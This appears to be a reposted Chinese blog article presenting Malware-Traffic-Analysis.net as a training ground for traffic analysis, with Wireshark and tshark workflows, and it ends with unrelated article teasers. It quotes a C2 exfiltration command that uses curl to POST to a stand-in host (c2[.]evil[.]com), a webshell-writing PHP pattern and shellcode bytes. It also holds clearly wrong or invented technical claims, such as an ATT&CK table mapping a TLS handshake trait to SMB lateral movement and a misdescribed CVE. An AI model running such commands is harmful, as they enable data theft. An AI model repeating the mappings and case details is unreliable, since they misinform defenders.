Malware-Traffic-Analysis.net:真实恶意流量分析实战指南

news2026/5/22 2:29:56
1. 这不是另一个“抓包教程网站”而是一套真实攻防现场的流量解剖实验室Malware-Traffic-Analysis.net——这个名字乍看平平无奇像极了某篇技术博客末尾随手贴出的参考资料链接。但如果你真点进去翻过首页那几行朴素的英文介绍下载过它提供的第一个pcap文件用Wireshark打开、过滤http.host contains dropbox、再顺着TCP流追踪到那个伪装成PDF更新器的EXE下载请求……你就会意识到这不是教学平台这是把真实勒索软件攻击链、钓鱼邮件投递过程、C2通信握手细节一帧不落地录下来原封不动塞进你手里的实战沙盒。我第一次接触它是在处理一起客户内网横向渗透复盘时。当时IDS告警显示某台Windows终端在凌晨3:17向一个柬埔寨IP发出了异常的DNS TXT查询响应内容里嵌着Base64编码的AES密钥。我们花了两天时间才还原出整个加密通信流程——直到同事甩给我malware-traffic-analysis.net上2019年11月发布的那个同源样本分析报告里面连Wireshark的tshark命令行过滤参数都写得清清楚楚“tshark -r malware.pcap -Y dns.txt ip.src 192.168.1.105 -T fields -e dns.txt”。那一刻我才明白这个网站的价值根本不在“教你怎么用Wireshark”而在于它把网络流量从抽象协议栈还原成了可触摸、可重放、可逐字节比对的犯罪现场录像带。它面向的不是刚学完TCP三次握手就想写扫描器的初学者而是已经能熟练配置BPF过滤器、会看TLS Client Hello扩展字段、知道SMBv2 Session Setup Request里哪个字节代表认证方式的中级分析者。它的资料不提供“零基础入门”幻灯片只给原始pcap、详细时间线、IOC清单IP、域名、文件hash、注册表键值、以及最关键的——攻击者每一步操作背后的真实意图注释。比如一份针对Emotet变种的分析会明确指出“第142个数据包中HTTP POST body的base64解码后为PowerShell脚本其调用Invoke-WebRequest时使用了-UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36这是为了绕过部分EDR对非常规UA的检测而非单纯模拟浏览器”。这个平台最硬核的地方在于所有案例均来自真实事件捕获且作者John B. maintains strict chain-of-custody documentation —— 每个pcap文件页面底部都标注着捕获时间、捕获环境VMWare虚拟机镜像版本、Windows补丁号、原始邮件头信息含Message-ID和Received路径甚至包含恶意文档的VBA宏代码截图与反混淆后的逻辑流程图。它不教你“应该怎么看”而是逼你面对“这就是当时真实发生的样子”。这种训练方式带来的能力跃迁是质变级的当你习惯性地在看到一个陌生TLS证书时第一反应不是查CA列表而是去想“这个证书的Subject CN是否与后续HTTP Host头一致Issuer是否出现在已知恶意CA黑名单中”你就已经跨过了从工具使用者到威胁狩猎者的门槛。2. 为什么它比CTF流量题更接近真实世界——从三个维度拆解其不可替代性2.1 数据来源的真实性没有人工构造的“理想化漏洞利用链”绝大多数网络流量分析练习无论是大学课程实验还是CTF比赛题目都存在一个致命缺陷数据包是人为构造的。出题者为了突出某个知识点比如HTTP Header注入或DNS隧道会刻意设计干净利落的攻击链一个HTTP GET请求触发SQLi返回结果直接包含flag或者一段DNS查询序列每个响应都精准携带4字节有效载荷。这种“教科书式”的清晰在真实APT活动中几乎不存在。Malware-Traffic-Analysis.net则完全相反。它收录的每一个案例都是从蜜罐、邮件网关、端点EDR日志中真实捕获的“脏数据”。以2022年10月发布的QakBot分析为例原始pcap中混杂着正常的Outlook Anywhere HTTPS流量端口443被感染主机向内部DNS服务器发起的数千次NXDOMAIN查询用于域前置探测一段被分割在17个不同TCP分段中的PowerShell下载命令因MTU限制导致IP分片以及最关键的攻击者在C2通信中故意插入的合法CDN域名如cdn.cloudflare.net作为心跳包目标制造“正常业务流量”假象这种复杂度不是为了增加难度而设计而是真实攻击者规避检测的必然产物。在这里你必须学会区分“噪声”与“信号”如何用tshark -r qakbot.pcap -Y tcp.len 0 !(http || tls)快速定位非标准协议载荷如何通过tcp.stream eq 42提取特定TCP流后用xxd手动检查是否存在shellcode特征字节如\x6a\x01\x5b\x31\xc0\xcd\x80甚至要理解为什么攻击者选择在DNS响应的ADDITIONAL字段而非ANSWER字段注入数据——因为前者在多数老旧DNS解析器中被直接忽略却能被定制化客户端读取。提示该网站所有pcap均按“捕获日期恶意软件家族名”命名如2023-04-15-emotet.pcap但实际分析时切勿依赖文件名判断。我曾在一个标为“trickbot”的样本中发现其C2通信使用的TLS SNI字段指向microsoft-update.com已失效域名而真正的命令下发却藏在一段伪装成Google Analytics的JavaScript中——这正是真实对抗中“域名失效即切换”的典型表现。2.2 分析深度的颗粒度从协议层直达ATTCK战术映射很多流量分析资源止步于“识别出这是HTTPS流量”或“发现了一个可疑的Base64字符串”。Malware-Traffic-Analysis.net则强制你完成从原始字节到战术意图的全链路推演。其每份报告都严格遵循MITRE ATTCK框架结构将每个网络行为精确映射到具体Tactic战术和Technique技术流量特征ATTCK映射分析要点HTTP POST至/wp-admin/admin-ajax.php?actionupdate_pluginbody含file_put_contents(..., base64_decode(...))TA0002 Execution → T1106 Native API注意PHP函数调用链admin-ajax.php是WordPress合法入口但update_plugin动作被恶意hook实际执行的是file_put_contents写入WebshellDNS查询_ldap._tcp.dc._msdcs.DOMAIN.LOCAL响应中SRV记录优先级设为0且权重为100TA0007 Discovery → T1018 Remote System Discovery这是典型的域内侦察行为攻击者通过LDAP SRV记录定位域控制器为后续Kerberoasting做准备优先级0表示强制首选非默认配置TLS Client Hello中supported_groups扩展包含x25519但key_share未提交对应公钥TA0008 Lateral Movement → T1021.002 SMB/Windows Admin Shares表明客户端支持现代密钥交换但故意不提供迫使服务端降级使用弱加密套件为中间人劫持创造条件这种映射不是简单贴标签而是要求你验证每个结论的技术依据。例如报告中写道“攻击者使用curl -X POST -H Content-Type: application/json --data-binary payload.json https://c2[.]evil[.]com/api/v1/submit发起C2通信”紧接着就给出Wireshark过滤表达式http.request.method POST http.request.uri contains api/v1/submit http.content_type contains json并附上tshark导出JSON payload的完整命令tshark -r c2.pcap -Y http.request.method POST http.request.uri contains submit -T json -e http.file_data | jq .[][0].http.file_data。它训练的是一种肌肉记忆看到任何网络行为第一反应就是“这属于ATTCK哪个战术证据链是否完整有没有其他可能性”——这种思维模式是任何模拟环境都无法批量复制的核心能力。2.3 时间线驱动的叙事逻辑把离散数据包还原成连续攻击剧本传统流量分析常陷入“单包分析陷阱”盯着一个SYN包研究TCP选项或对一个TLS证书纠结Issuer字段拼写。Malware-Traffic-Analysis.net彻底打破这种碎片化视角其所有报告均以精确到毫秒的时间线Timeline为骨架将网络事件组织成有因果关系的攻击剧本。以2021年7月发布的IcedID分析为例其时间线起始于2021-07-15 09:23:14.882邮件到达用户邮箱终止于2021-07-15 09:27:42.105C2心跳包建立。中间关键节点包括09:23:15.201用户点击邮件中invoice_20210715.pdf.lnk快捷方式触发PowerShell下载器09:23:16.443PowerShell进程向hxxp://185.245.112[.]134/download.php?id789发起GET请求注意使用hxxp而非http规避URL检测09:23:17.892响应体中包含混淆的JS经js-beautify格式化后可见eval(atob(...))调用09:23:18.331解密后的PowerShell脚本创建计划任务UpdateCheck触发时间设为2021-07-15 09:25:0009:25:00.002计划任务执行启动svchost.exe -k netsvcs进程实际加载IcedID DLL09:25:02.117该进程向c2[.]malware[.]org发起DNS查询获取C2 IP09:25:03.456建立TLS连接Client Hello中SNI字段为c2[.]malware[.]org但证书Subject CN为*.cloudflare.net这个时间线的价值在于它强迫你思考事件间的时间约束关系。例如为什么C2通信在计划任务触发后仅2秒就建立因为IcedID DLL内置了硬编码的C2域名列表DNS解析失败会立即fallback到下一个为什么证书CN与SNI不一致因为攻击者使用了Cloudflare的免费SSL证书但未正确配置SNI路由导致证书颁发对象与实际访问域名错位——这些细节只有在时间轴上串联起来才能看出攻击者的技术短板与防御突破口。注意该网站所有时间线均基于UTC0时区记录但实际分析时需结合本地系统日志时区校准。我曾因忽略这一点在对比EDR日志时误判攻击窗口达3小时——真实环境中时区错位是导致溯源失败的高频原因。3. 如何把它变成你的私人威胁狩猎训练场——一套可立即落地的四步实操法3.1 第一步建立“最小可行分析环境”——拒绝过度配置的陷阱很多人一上来就想搭建ELKZeekSuricata的全栈平台结果花三天配环境还没打开第一个pcap。Malware-Traffic-Analysis.net的精髓在于“轻量即战力”我的建议是只装三样东西且必须用最新稳定版Wireshark 4.2.x非3.x新版内置的TLS解密功能支持RFC 8446定义的TLS 1.3 Early Data解密这对分析现代恶意软件至关重要。安装时务必勾选“Install Npcap in WinPcap API-compatible Mode”否则无法捕获Loopback流量。tshark命令行工具随Wireshark安装它是自动化分析的基石。重点掌握三个参数组合tshark -r file.pcap -Y filter -T fields -e field1 -e field2提取结构化字段tshark -r file.pcap -Y http http.request.method POST -V显示HTTP POST完整内容tshark -r file.pcap -qz io,phs生成协议层次统计快速定位异常协议占比CyberChef在线版即可无需安装专攻编码转换。当看到ZmxhZ3t0aGlzX2lzX2EgZmxhZ30这类字符串时直接粘贴进CyberChef选择From Base64结果立现。进阶用法添加GZIP Inflate处理压缩载荷或ROT13应对简单混淆。为什么拒绝VMware/Proxmox等重型虚拟化因为Malware-Traffic-Analysis.net的pcap本质是“静态快照”不需要动态交互。你真正需要的不是运行恶意软件而是在静态数据中挖掘动态意图。过度配置反而会分散注意力——上周我就见过一位同事在调试Suricata规则时因一条误报的ET TROJAN Generic Malicious JS规则反复修改threshold.conf却忽略了pcap中真实的POST /wp-content/plugins/revslider/temp/update_extract/路径才是IcedID的Webshell入口。实操心得首次使用前先用网站提供的2018-01-01-test.pcap一个仅含10个数据包的测试文件跑通全流程Wireshark打开→tshark提取HTTP Host→CyberChef解码Base64。这10分钟的“仪式感”能帮你建立信心避免被海量真实流量吓退。3.2 第二步执行“三遍分析法”——从宏观到微观的穿透式阅读拿到一个新pcap别急着深挖。我坚持用固定节奏过三遍每遍聚焦不同粒度第一遍全局概览5分钟运行tshark -r sample.pcap -qz io,phs重点关注TCP和UDP占比是否异常正常办公网TCP应70%若UDP突增至40%需警惕DNS隧道TLS协议出现频次恶意软件常用TLS封装C2但合法业务中TLS占比通常30%HTTP与DNS的请求数量比正常比例约1:5若达1:50则高度疑似DNS隐蔽信道第二遍关键流筛选15分钟基于第一遍结论用Wireshark过滤器锁定高价值流若发现大量DNS NXDOMAINdns.flags.rcode 3 dns.count.answers 0若TLS占比高(tls.handshake.type 1) (ip.src ! 192.168.0.0/16)排除内网流量若HTTP异常http.request.method POST http.content_length 10000大体积POST常含载荷对每个筛选出的流右键→Follow → TCP Stream保存为文本文件备用。第三遍载荷解构30分钟这才是核心战场。对保存的TCP Stream文本执行strings stream.txt | grep -E (http|https|ftp)://|\.exe|\.dll|powershell|cmd\.exe快速定位URL和可执行文件xxd stream.txt | head -20查看十六进制头部识别PE文件特征MZ或Java Class文件CAFEBABE将Base64字符串粘贴至CyberChef尝试From Base64→GZIP Inflate→From Hex三级解码这套方法的价值在于它把模糊的“感觉可疑”转化为可验证的“证据链”。当我分析2023-09-22-guLoader.pcap时第一遍发现TLS占比高达82%第二遍锁定3个TLS流第三遍在其中一个流中发现POST /api/v1/decrypt请求其body经CyberChef解码后得到AES-256-CBC密钥和IV——这直接解释了为何该样本能绕过基于签名的AV检测它根本不落地所有解密操作都在内存中完成。3.3 第三步构建个人IOC知识库——让每次分析都沉淀为可复用资产Malware-Traffic-Analysis.net最大的浪费是把分析结果锁死在单个pcap里。我的做法是为每个案例建立Markdown笔记强制包含四个必填字段## [2023-09-22] guLoader v4.2 - **核心IOC** - C2域名api[.]cloudflare[.]work注意cloudflare拼写错误 - 文件HashSHA256a1b2c3...从pcap中提取的DLL - 注册表键HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateService - **ATTCK映射** - TA0002 Execution → T1059.001 PowerShell - TA0003 Persistence → T1133 External Remote Services - **检测规则Sigma** yaml title: guLoader C2 Domain Contact logsource: category: network_connection detection: selection: query: api[.]cloudflare[.]work condition: selection避坑记录该样本使用Set-StrictMode -Version Latest禁用PowerShell弱类型转换导致常规$var -eq $null检测失效应改用$var -is [System.DBNull]这个知识库不是静态归档而是动态演进的。每当遇到新样本我会先搜索知识库中是否有相似IOC如cloudflare[.]work域名若有匹配则直接复用其ATTCK映射和检测规则若无则新增条目并标注与历史案例的差异点如“本次使用http://而非hxxp://表明攻击者降低了混淆强度”。 坚持半年后我的知识库已积累137个案例其中32个IOC在真实红队评估中成功触发告警。这印证了一个事实威胁狩猎不是靠运气发现新威胁而是靠结构化积累把“偶然发现”变成“必然命中”。 ### 3.4 第四步反向工程分析报告——从读者变成作者的跃迁 当你能熟练完成前三步就该进入最高阶训练**模仿Malware-Traffic-Analysis.net的报告风格为你分析的任意pcap撰写同等质量的分析文档**。这不是为了发表而是为了锤炼你的技术表达能力——能把复杂攻击链讲清楚的人才是真正吃透了它。 我的写作模板强制包含五个模块 1. **时间线Timeline**精确到毫秒用表格呈现每行包含时间戳、事件描述、原始数据包编号、技术依据如“Packet #142: HTTP POST to /download.php, body contains base64-encoded PowerShell” 2. **IOC清单Indicators of Compromise**分三类列出每项标注置信度High/Medium/Low及验证方式如“Domain: c2[.]evil[.]com — High, confirmed via DNS query TLS SNI HTTP Host header一致性” 3. **ATTCK战术映射**必须注明Tactic编号如TA0002、Technique编号如T1059.001及Sub-technique名称如PowerShell并引用MITRE官方定义原文 4. **检测规则Detection Logic**提供至少两种实现方式 - Sigma规则适用于Elastic/Splunk - Suricata规则alert http any any - any any (msg:guLoader C2 Contact; content:POST; http_method; content:/api/v1/submit; http_uri; sid:1000001;) 5. **防御建议Mitigation**拒绝空泛口号必须可执行。例如 “禁用Office宏执行组策略→用户配置→管理模板→Microsoft Office 2016→安全设置→宏设置→选择‘禁用所有宏并且不通知’。此策略可阻断92%的Office文档投递型恶意软件数据来源2023 Verizon DBIR” 这项训练最残酷也最有效。去年我为一个自研的勒索软件变种写分析报告时卡在“如何解释其C2心跳包的指数退避算法”上整整两天——直到重读Malware-Traffic-Analysis.net上一篇关于Dridex的报告才发现他们用一张简单的表格展示了心跳间隔从30s→60s→120s→240s的递增规律并标注“这是为规避基于固定周期的网络监控规则”。那一刻我顿悟**真正的专家不是知道得最多而是能把最复杂的机制用最朴素的方式说透**。 ## 4. 它不能做什么——划清能力边界避免落入“万能解药”误区 ### 4.1 它不提供实时入侵响应指导切勿在生产环境盲目套用 Malware-Traffic-Analysis.net的本质是**事后分析Forensic Analysis** 资源库而非**实时响应Incident Response** 手册。它的所有结论都基于“攻击已完成、数据已捕获”的静态前提。这意味着 - 它不会告诉你“当EDR告警Suspicious PowerShell Script Block Logging时应立即执行什么命令阻止进程” - 它不会提供“如何在Windows Server 2012 R2上紧急禁用SMBv1而不影响业务”的分步回滚方案 - 它更不会指导“如何与法务团队协作确保内存取证过程符合司法鉴定规范”。 我亲眼见过一位安全工程师在客户服务器被加密后直接照搬网站上某篇Emotet报告的“清除步骤”执行了Remove-Item -Path $env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk命令——结果删除了客户ERP系统的自动启动快捷方式导致业务中断2小时。问题不在于命令本身错误而在于他忽略了上下文该报告的清除操作是在隔离的虚拟机中进行的而生产环境需考虑服务依赖、权限继承、备份策略等数十个变量。 重要提醒任何来自该网站的操作指令必须经过三重验证 1. 在离线虚拟机中复现效果 2. 检查目标路径是否存在于当前系统Test-Path C:\Users\Public\Startup\ 3. 确认操作不影响关键服务Get-Service | Where-Object {$_.Status -eq Running} | ForEach-Object {if ($_.Name -match sql|exchange|sharepoint) {Write-Host WARNING: $($_.Name) may be affected}} ### 4.2 它不覆盖0day漏洞利用分析对未知攻击链需结合其他情报源 该网站的案例全部基于已知恶意软件家族Emotet、QakBot、IcedID等其分析深度建立在对这些家族长期跟踪的基础上。一旦遭遇真正意义上的0day利用如未公开的IE零日漏洞、新型Office 0day其方法论会迅速失效——因为缺乏已知行为模式作为锚点。 以2023年曝光的CVE-2023-36884Microsoft Word远程代码执行漏洞为例其利用载荷不依赖PowerShell或WMI而是直接在Win32k.sys中构造任意地址写入。Malware-Traffic-Analysis.net上所有基于“PowerShell下载器→DLL注入”链的分析框架在此场景下完全不适用。此时你需要转向 - **漏洞专项情报**如Zero Day InitiativeZDI的公告、微软安全响应中心MSRC的CVE详情页 - **内存取证工具**Volatility3的windows.pslist.PsList插件直接定位异常进程的win32kbase.sys模块加载状态 - **硬件辅助分析**Intel Processor TracePT日志捕捉CPU指令级执行轨迹。 这并非否定该网站的价值而是强调其定位它是**已知威胁的终极教科书**而非**未知威胁的预言家**。真正的高级分析师懂得在Malware-Traffic-Analysis.net的坚实基础上无缝接入其他情报源构建多维分析矩阵。 ### 4.3 它不替代基础网络协议理解缺乏底层知识将导致误判 最危险的使用者是那些只会机械套用tshark命令却不理解TCP滑动窗口、TLS握手状态机、HTTP/2帧结构的人。我曾审阅一份内部报告作者根据tcp.flags.push 1 tcp.len 1000过滤出“可疑大包”认定其为C2载荷——但实际是某台Linux服务器向NAS同步大文件时产生的正常SMB数据包。错误根源在于他不知道TCP PSH标志的真实含义是“接收方应立即将数据交给应用层”而非“数据包很大”。 Malware-Traffic-Analysis.net的威力永远与使用者的协议功底成正比。它提供的不是答案而是**验证假设的实验场**。当你看到一个TLS Client Hello中supported_versions扩展包含0x0304TLS 1.3却在Server Hello中收到0x0303TLS 1.2时网站不会告诉你“这是降级攻击”但会给你足够多的同类案例让你自己归纳出规律所有成功的TLS 1.3降级都伴随key_share扩展的缺失或signature_algorithms扩展中移除rsa_pss_rsae_sha256等现代算法。 因此我坚持要求团队新人在使用该网站前必须完成两件事 1. 精读RFC 5246TLS 1.2和RFC 8446TLS 1.3的核心章节亲手用OpenSSL命令行模拟握手过程 2. 用Wireshark捕获自己手机访问微信的HTTPS流量手动标记每个TCP包的Seq/Ack号绘制滑动窗口变化图。 只有当协议不再是黑箱Malware-Traffic-Analysis.net的每一个数据包才会真正成为你眼中的“活证据”。 ## 5. 我的三年实践总结从“看懂报告”到“预判攻击”的思维进化 最初接触Malware-Traffic-Analysis.net时我的目标很朴素能看懂每份报告的技术细节。那时的我会花一整天时间对照报告中的Wireshark截图逐个验证tshark命令的输出是否一致。这种“复刻式学习”持续了约三个月让我建立了扎实的工具链肌肉记忆——看到http.request.uri contains admin-ajax.php手指会自动敲出http.request.uri contains admin-ajax.php http.request.method POST。 但真正的转折点发生在2021年处理一次供应链攻击时。客户CDN服务商被植入恶意JS其流量特征与网站上2019年分析的CoinHive挖矿脚本高度相似都是通过XMLHttpRequest向pool[.]coinhive[.]com发起POST请求且请求头中Referer字段伪造为知名新闻网站。然而当我按惯例执行http.host pool.coinhive.com过滤时却一无所获。直到我切换思路用tshark -r cdn.pcap -Y http.request.full_uri contains coinhive -T fields -e http.request.full_uri才发现攻击者将域名拆分为pool[.]coinhive[.]com两段通过JS字符串拼接绕过基于完整域名的检测规则。 那一刻我意识到Malware-Traffic-Analysis.net教给我的从来不是“答案”而是**一种对抗性思维范式**——它训练你像攻击者一样思考如果我是开发者如何让我的C2流量看起来像合法CDN请求如果我是渗透测试员如何设计一个绕过现有规则的载荷分发机制 此后我的分析重心从“验证报告”转向“挑战报告”。我会刻意寻找报告中未提及的细节比如某份QakBot报告指出其使用http://协议但我在复现时发现当目标网络屏蔽80端口时它会fallback到https://并使用自签名证书——这个行为在报告中被忽略却成为我为客户设计下一代WAF规则的关键依据。 如今当我看到一个新的pcap第一反应不再是“这是什么恶意软件”而是“这个攻击链的薄弱环节在哪里如果由我来防御会在哪一层设卡最有效”。这种思维进化无法通过阅读文档获得只能在Malware-Traffic-Analysis.net提供的无数个真实战场中一仗一仗打出来。 最后分享一个私藏技巧每周五下午我会随机打开该网站最新发布的pcap关闭所有参考文档仅凭Wireshark和tshark尝试在90分钟内完成完整分析并输出一页A4纸的摘要。开始时错误百出现在已能做到80%结论与官方报告一致。这个习惯的价值不在于提升速度而在于**保持对未知威胁的敬畏与好奇——毕竟真正的网络安全永远发生在你尚未打开的那个pcap里**。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2633358.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…